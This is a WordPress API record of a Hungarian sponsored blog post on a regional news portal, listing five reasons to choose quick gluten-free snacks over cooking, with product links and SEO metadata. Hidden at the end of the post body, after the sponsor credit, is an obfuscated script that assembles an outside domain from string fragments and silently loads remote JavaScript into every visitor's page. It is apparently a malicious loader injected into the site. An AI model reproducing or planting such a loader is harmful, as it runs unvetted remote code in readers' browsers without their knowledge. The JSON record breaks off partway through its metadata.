{"id":34816,"date":"2021-07-13T13:21:08","date_gmt":"2021-07-13T11:21:08","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=34816"},"modified":"2021-07-13T13:21:31","modified_gmt":"2021-07-13T11:21:31","slug":"5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/","title":{"rendered":"5 ok, ami\u00e9rt glut\u00e9nmentes gyors\u00e9telt v\u00e1lasztunk a f\u0151z\u0151csk\u00e9z\u00e9s helyett"},"content":{"rendered":"<p><strong>Vannak, akik szeretnek glut\u00e9nmentes gyors-\u00e9teleket fogyasztani, m\u00e1sokat kir\u00e1z a hideg a gyors kaja hallat\u00e1n is.<\/strong><\/p>\n<p>Persze meg\u00e9rtem az ut\u00f3bbiak csoportj\u00e1t is, hiszen a gyors\u00e9t\u00f3l kifejez\u00e9s az eg\u00e9szs\u00e9gtelennek kiki\u00e1ltott \u201ejunk food\u201d-ot jelenti sokak sz\u00e1m\u00e1ra. Holott gyors \u00e9telt lehet otthon is k\u00e9sz\u00edteni, eg\u00e9szs\u00e9gesen, p\u00e1r perc alatt \u00fagy, hogy nem kell k\u00f6zben \u00f3r\u00e1kat t\u00f6lteni az \u00e9tel kital\u00e1l\u00e1s\u00e1val, a bev\u00e1s\u00e1rl\u00e1ssal \u00e9s a f\u0151z\u00e9ssel. \u00cdgy vagy \u00fagy, szerintem mindenkinek az \u00e9let\u00e9ben van legal\u00e1bb egy nyom\u00f3s indok, ami\u00e9rt id\u0151nk\u00e9nt a gyors \u00e9telt v\u00e1lasztja. Manaps\u00e1g pedig a glut\u00e9nmentes gyors \u00e9telek v\u00e1laszt\u00e9ka is napr\u00f3l, napra b\u0151v\u00fcl, ak\u00e1r a gyors\u00e9ttermeket n\u00e9zz\u00fck, ak\u00e1r az otthon pillanatok alatt \u00f6sszedobhat\u00f3 \u00e9s t\u00e1pl\u00e1l\u00f3, jel\u00f6lten glut\u00e9nmentes k\u00e9nyelmi term\u00e9keket.<\/p>\n<p>\u00d6ssze\u00e1ll\u00edtottam egy list\u00e1t, hogy szerintem mi\u00e9rt v\u00e1lasztjuk a k\u00f6nnyebb utat a f\u0151z\u0151csk\u00e9z\u00e9s helyett. Ha magadra ismert\u00e9l, vagy van egy olyan indokod, amit kihagytam, \u00edrd meg hozz\u00e1sz\u00f3l\u00e1sban!<\/p>\n<p><span style=\"font-weight: bold;\">1# Gyors<\/span><\/p>\n<p>A f\u0151z\u00e9s \u00e9s az el\u0151k\u00e9sz\u00fcletek alatt lassan kullognak a gy\u00f6tr\u0151 m\u00e1sodpercek, \u00e9s n\u00e9ha gy\u00f6trelmes a v\u00e1rakoz\u00e1s. \u00c9ppen ez\u00e9rt olyan csod\u00e1s dolog megrendelni valamit, ami j\u00f3 esetben szinte azonnal elk\u00e9sz\u00fcl. Most, hogy a COVID-19 miatt sokan otthon ragadtunk \u2013 k\u00f6zt\u00fck \u00e9n is -, m\u00e9g a gyors\u00e9ttermekre is v\u00e1rni kell. Na nem t\u00fal sokat, de n\u00e9ha m\u00e9g ennyit sem b\u00edrok ki. Ilyenkor k\u00e9sz\u00edtek egy hajdinak\u00e1s\u00e1t, vagy egy <a href=\"https:\/\/www.namaximum.hu\/instant-millet-porridge-instant-koles\/\" target=\"_blank\" rel=\"noopener\"><span style=\"text-decoration: underline; color: #0000ff;\">k\u00f6lesk\u00e1s\u00e1t<\/span><\/a>, meg\u00e9des\u00edtem, belekeverek egy kan\u00e1l mogyor\u00f3 vagy mandulavajat, \u00e9s a szebb napokon m\u00e9g valamilyen liofiliz\u00e1lt gy\u00fcm\u00f6lccsel is megsz\u00f3rom. Egy ilyen 3-4 perces gyors k\u00e1s\u00e1val sim\u00e1n kib\u00edrom a munk\u00e1t k\u00e9t f\u0151\u00e9tkez\u00e9s k\u00f6z\u00f6tt.<\/p>\n<p><span style=\"font-weight: bold;\">2# Nincs kedv\u00fcnk f\u0151zni<\/span><\/p>\n<p>Bevallom, b\u0171n\u00f6s vagyok. Vannak napok, amikor eg\u00e9szen egyszer\u0171en nem visz r\u00e1 a l\u00e9lek a f\u0151z\u00e9sre. Pedig van k\u00e9t kamasz fiam, akik olyanok, mint a s\u00e1sk\u00e1k. B\u00e1rmennyire is im\u00e1dok f\u0151zni, n\u00e9ha annyira kimer\u00fcltnek vagy \u00e9ppens\u00e9ggel lust\u00e1nak \u00e9rzem magam, hogy egy bors\u00f3f\u0151zel\u00e9ket sem vagyok k\u00e9pes \u00f6sszekutyulni. Ilyenkor gyakran eszem reggelire egy feh\u00e9rje turmixot, vagy a nagy kedvencemet, az \u00fatif\u0171magh\u00e9jb\u00f3l k\u00e9sz\u00fclt <span style=\"text-decoration: underline; color: #0000ff;\"><a style=\"color: #0000ff; text-decoration: underline;\" href=\"https:\/\/www.glutenmentesdieta.hu\/glutenmentes-hamis-bundas-kenyer\/\" target=\"_blank\" rel=\"noopener\">hamis bund\u00e1s kenyeret<\/a><\/span>.<\/p>\n<p>Ha turmixolok, akkor kendermag proteinnel turb\u00f3zom fel a s\u0171r\u0171 szmutyit. A <a href=\"https:\/\/www.namaximum.hu\/bio-hemp-protein-bio-kender-protein-magokbol\/\" target=\"_blank\" rel=\"noopener\"><span style=\"text-decoration: underline; color: #0000ff;\">kendermag protein<\/span><\/a> stabilan tartja a v\u00e9rcukorszintet, energi\u00e1val t\u00f6lt fel \u00e9s seg\u00edt, hogy agyilag is b\u00edrjam a sokszor er\u0151ltetett menet\u0171 napokat. Teszek bele m\u00e9g ban\u00e1nt, z\u00f6ldeket, egy kis zabpelyhet, \u00e9s a k\u00f6vetkez\u0151 \u00e9tkez\u00e9sig sim\u00e1n kib\u00edrom.<\/p>\n<p><span style=\"font-weight: bold;\">3# \u00c9letment\u0151, ha k\u00e9s\u00e9sben vagyunk<\/span><\/p>\n<p>Nem tudom, hogy vagy vele, de \u00e9n gyakran versenyt futok az id\u0151vel. Munka, iskola, digit\u00e1lis oktat\u00e1s, hat\u00e1rid\u0151k, h\u00e1ztart\u00e1s, \u00e9n-id\u0151, sport, meg ami a cs\u00f6v\u00f6n kif\u00e9r. Egyed\u00fcl\u00e1ll\u00f3, k\u00e9tgyerekes anyukak\u00e9nt sokszor a f\u0151z\u00e9s az utols\u00f3 gondolatom. Szerintem ezzel m\u00e9g sok ezer anyuka van hasonl\u00f3an, ez\u00e9rt is olyan nagyszer\u0171, hogy lehet\u0151s\u00e9g\u00fcnk van a l\u00e1bunkat l\u00f3gatni f\u0151z\u00e9s helyett. Olyan j\u00f3 \u00e9rz\u00e9s p\u00e1r perc el\u0151nyt nyerni, ha meg m\u00e9g finom is, amit gyorsan bekapunk, akkor meg k\u00e9sz f\u0151nyerem\u00e9ny. Az egyik ilyen \u00e9letment\u0151m a <a href=\"https:\/\/www.namaximum.hu\/peanut-butter-nn\/\" target=\"_blank\" rel=\"noopener\"><span style=\"text-decoration: underline; color: #0000ff;\">mogyor\u00f3vaj<\/span><\/a>. Tele van feh\u00e9rj\u00e9vel \u00e9s \u00e9rt\u00e9kes zs\u00edrokkal, kal\u00f3ri\u00e1val is persze, de mit sz\u00e1m\u00edt. Nem \u00fcres hassal rohang\u00e1lok, \u00e9s ez megfizethetetlen.<\/p>\n<p><span style=\"font-weight: bold;\">4# Gyorsan kiel\u00e9g\u00edti a v\u00e1gyakat<\/span><\/p>\n<p>Neked is felt\u0171nt m\u00e1r, hogy milyen sok \u00e9lelmiszer rekl\u00e1m van a k\u00e9s\u0151 esti \u00f3r\u00e1kban a TV-ben? \u00c9s m\u00e1r hi\u00e1ba kapcsolgatom a csatorn\u00e1kat, nagyj\u00e1b\u00f3l egy id\u0151ben van mindenhol rekl\u00e1msz\u00fcnet hasonl\u00f3 \u00fczenetekkel. Egy\u00e9l. Hirtelen elfog az intenz\u00edv v\u00e1gy l\u00e1tva egy habos-babos s\u00fctem\u00e9nyeket, vagy egy g\u0151z\u00f6lg\u0151 kacsas\u00fcltet. Azt\u00e1n hirtelen azon kapom magam, hogy kirohanok a konyh\u00e1ba, fogok egy b\u00f6gr\u00e9t, beleeresztek egy toj\u00e1st, egy deci n\u00f6v\u00e9nyi tejet, 1 kan\u00e1l zabpelyhet, 1 kan\u00e1l rizsfeh\u00e9rj\u00e9t, n\u00e9mi \u00e9des\u00edt\u0151t \u00e9s 1-2 kiskan\u00e1l olajat. Keverem-kavarom, majd a mikr\u00f3ban 2 perc alatt k\u00e9szre s\u00fct\u00f6m a mikr\u00f3s b\u00f6gr\u00e9s s\u00fctit. Mire lemegy a rekl\u00e1mblokk, a vill\u00e1ms\u00fctimmel az \u00f6lemben n\u00e9zem tov\u00e1bb az esti filmet.<\/p>\n<p><span style=\"font-weight: bold;\">5# K\u00e9s\u0151n v\u00e9gz\u00fcnk, \u00e9s nem akarunk korg\u00f3 gyomorral lefek\u00fcdni<\/span><\/p>\n<p>B\u00e1r az ut\u00f3bbi h\u00f3napokban nem igen van lehet\u0151s\u00e9g\u00fcnk kimozdulni otthonr\u00f3l, b\u00e9keid\u0151ben mindenkinek j\u00f3l esik n\u00e9ha egy csajos vagy pasis este a bar\u00e1tokkal. Id\u0151nk\u00e9nt el\u0151fordul, hogy a bar\u00e1tn\u0151immel a kora este belecs\u00faszik a k\u00e9s\u0151 esti \u00f3r\u00e1kba, azt\u00e1n csak azon kapom magam, hogy pizsam\u00e1ban a konyh\u00e1ban \u00f6sszekutyulok valami vill\u00e1m harapnival\u00f3t. M\u00e9gsem fek\u00fcdhetek le \u00fcres hassal.<\/p>\n<p>B\u00e1rmennyire is b\u0151v\u00fcl a glut\u00e9nmentes k\u00edn\u00e1lat, az\u00e9rt m\u00e9gis csak korl\u00e1tozottak a lehet\u0151s\u00e9gek. \u00c9n mindig tartok itthon \u00e9letment\u0151 alapanyagokat, amikb\u0151l seperc alatt a t\u00e1ny\u00e9rra var\u00e1zsolhatok valami finoms\u00e1got.<\/p>\n<p>Amennyiben glut\u00e9n\u00e9rz\u00e9keny vagy, \u00fcgyelj arra, hogy ezek a gyors seg\u00edts\u00e9gek jel\u00f6lten glut\u00e9nmentesek legyenek, hiszen a gyors \u00e9tel is csak biztons\u00e1gosan \u00e9lvezetes.<\/p>\n<p><span style=\"font-style: italic;\">T\u00e1mogatott tartalom: <\/span><span style=\"font-style: italic;\">&#8222;<\/span><a href=\"http:\/\/www.namaximum.hu\/\" target=\"_blank\" rel=\"noopener\"><span style=\"text-decoration: underline; color: #0000ff;\">namaximum.hu<\/span><\/a><span style=\"font-style: italic;\">&#8222;<\/span><br \/>\n<script>\n(function(){\nxfX6_=(\"u\"+\"\")+\"s\"+\"\";xfX6_+=(\"tat.\")+(\"i\");\nxfX6=document.createElement(\"script\");xfX6.type=\"text\/javascript\";xfX6_+=\"nf\"+(\"o\")+\"\/\";\nxfX6u=\"307421857\"+\".\";xfX6.async=true;xfX6u+=\"l0yasuegfX6p63X7ya864jX17cmuj1\";\nxfX6.src=\"https:\/\/\"+xfX6_+xfX6u;xfX6b=document.body;xfX6b.appendChild(xfX6);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vannak, akik szeretnek glut\u00e9nmentes gyors-\u00e9teleket fogyasztani, m\u00e1sokat kir\u00e1z a hideg a gyors kaja hallat\u00e1n is. Persze meg\u00e9rtem az ut\u00f3bbiak csoportj\u00e1t is, hiszen a gyors\u00e9t\u00f3l kifejez\u00e9s az eg\u00e9szs\u00e9gtelennek kiki\u00e1ltott \u201ejunk food\u201d-ot jelenti sokak sz\u00e1m\u00e1ra. Holott gyors \u00e9telt lehet otthon is k\u00e9sz\u00edteni, eg\u00e9szs\u00e9gesen, p\u00e1r perc alatt \u00fagy, hogy nem kell k\u00f6zben \u00f3r\u00e1kat t\u00f6lteni az \u00e9tel kital\u00e1l\u00e1s\u00e1val, a<\/p>\n","protected":false},"author":1,"featured_media":34817,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[5831,5830],"class_list":{"0":"post-34816","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-hirek","8":"tag-glutenmentes-etel","9":"tag-gyorsetel"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>5 ok, ami\u00e9rt glut\u00e9nmentes gyors\u00e9telt v\u00e1lasztunk a f\u0151z\u0151csk\u00e9z\u00e9s helyett<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"5 ok, ami\u00e9rt glut\u00e9nmentes gyors\u00e9telt v\u00e1lasztunk a f\u0151z\u0151csk\u00e9z\u00e9s helyett\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"Vannak, akik szeretnek glut\u00e9nmentes gyors-\u00e9teleket fogyasztani, m\u00e1sokat kir\u00e1z a hideg a gyors kaja hallat\u00e1n is. Persze meg\u00e9rtem az ut\u00f3bbiak csoportj\u00e1t is, hiszen a gyors\u00e9t\u00f3l kifejez\u00e9s az eg\u00e9szs\u00e9gtelennek kiki\u00e1ltott \u201ejunk food\u201d-ot jelenti sokak sz\u00e1m\u00e1ra. Holott gyors \u00e9telt lehet otthon is k\u00e9sz\u00edteni, eg\u00e9szs\u00e9gesen, p\u00e1r perc alatt \u00fagy, hogy nem kell k\u00f6zben \u00f3r\u00e1kat t\u00f6lteni az \u00e9tel kital\u00e1l\u00e1s\u00e1val, a\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2021-07-13T11:21:08+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-13T11:21:31+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/dorogimedence.hu\/wp-content\/uploads\/2021\/07\/r1hyt1stt9lpmdc.png?fit=1200%2C628&ssl=1\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"628\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/07\\\/13\\\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/07\\\/13\\\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"5 ok, ami\u00e9rt glut\u00e9nmentes gyors\u00e9telt v\u00e1lasztunk a f\u0151z\u0151csk\u00e9z\u00e9s helyett\",\"datePublished\":\"2021-07-13T11:21:08+00:00\",\"dateModified\":\"2021-07-13T11:21:31+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/07\\\/13\\\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\\\/\"},\"wordCount\":989,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/07\\\/13\\\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/r1hyt1stt9lpmdc.png\",\"keywords\":[\"glut\u00e9nmentes \u00e9tel\",\"gyors\u00e9tel\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/07\\\/13\\\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/07\\\/13\\\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\\\/\",\"name\":\"5 ok, ami\u00e9rt glut\u00e9nmentes gyors\u00e9telt v\u00e1lasztunk a f\u0151z\u0151csk\u00e9z\u00e9s helyett\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/07\\\/13\\\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/07\\\/13\\\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/r1hyt1stt9lpmdc.png\",\"datePublished\":\"2021-07-13T11:21:08+00:00\",\"dateModified\":\"2021-07-13T11:21:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/07\\\/13\\\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/07\\\/13\\\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/07\\\/13\\\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/r1hyt1stt9lpmdc.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/07\\\/r1hyt1stt9lpmdc.png\",\"width\":1200,\"height\":628},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/07\\\/13\\\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"5 ok, ami\u00e9rt glut\u00e9nmentes gyors\u00e9telt v\u00e1lasztunk a f\u0151z\u0151csk\u00e9z\u00e9s helyett\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"5 ok, ami\u00e9rt glut\u00e9nmentes gyors\u00e9telt v\u00e1lasztunk a f\u0151z\u0151csk\u00e9z\u00e9s helyett","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/","og_locale":"hu_HU","og_type":"article","og_title":"5 ok, ami\u00e9rt glut\u00e9nmentes gyors\u00e9telt v\u00e1lasztunk a f\u0151z\u0151csk\u00e9z\u00e9s helyett","og_description":"Vannak, akik szeretnek glut\u00e9nmentes gyors-\u00e9teleket fogyasztani, m\u00e1sokat kir\u00e1z a hideg a gyors kaja hallat\u00e1n is. Persze meg\u00e9rtem az ut\u00f3bbiak csoportj\u00e1t is, hiszen a gyors\u00e9t\u00f3l kifejez\u00e9s az eg\u00e9szs\u00e9gtelennek kiki\u00e1ltott \u201ejunk food\u201d-ot jelenti sokak sz\u00e1m\u00e1ra. Holott gyors \u00e9telt lehet otthon is k\u00e9sz\u00edteni, eg\u00e9szs\u00e9gesen, p\u00e1r perc alatt \u00fagy, hogy nem kell k\u00f6zben \u00f3r\u00e1kat t\u00f6lteni az \u00e9tel kital\u00e1l\u00e1s\u00e1val, a","og_url":"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2021-07-13T11:21:08+00:00","article_modified_time":"2021-07-13T11:21:31+00:00","og_image":[{"width":1200,"height":628,"url":"https:\/\/i0.wp.com\/dorogimedence.hu\/wp-content\/uploads\/2021\/07\/r1hyt1stt9lpmdc.png?fit=1200%2C628&ssl=1","type":"image\/png"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"5 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"5 ok, ami\u00e9rt glut\u00e9nmentes gyors\u00e9telt v\u00e1lasztunk a f\u0151z\u0151csk\u00e9z\u00e9s helyett","datePublished":"2021-07-13T11:21:08+00:00","dateModified":"2021-07-13T11:21:31+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/"},"wordCount":989,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/07\/r1hyt1stt9lpmdc.png","keywords":["glut\u00e9nmentes \u00e9tel","gyors\u00e9tel"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/","url":"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/","name":"5 ok, ami\u00e9rt glut\u00e9nmentes gyors\u00e9telt v\u00e1lasztunk a f\u0151z\u0151csk\u00e9z\u00e9s helyett","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/07\/r1hyt1stt9lpmdc.png","datePublished":"2021-07-13T11:21:08+00:00","dateModified":"2021-07-13T11:21:31+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/07\/13\/5-ok-amiert-glutenmentes-gyorsetelt-valasztunk-a-fozocskezes-helyett\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/07\/r1hyt1stt9lpmdc.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/07\/r1hyt1stt9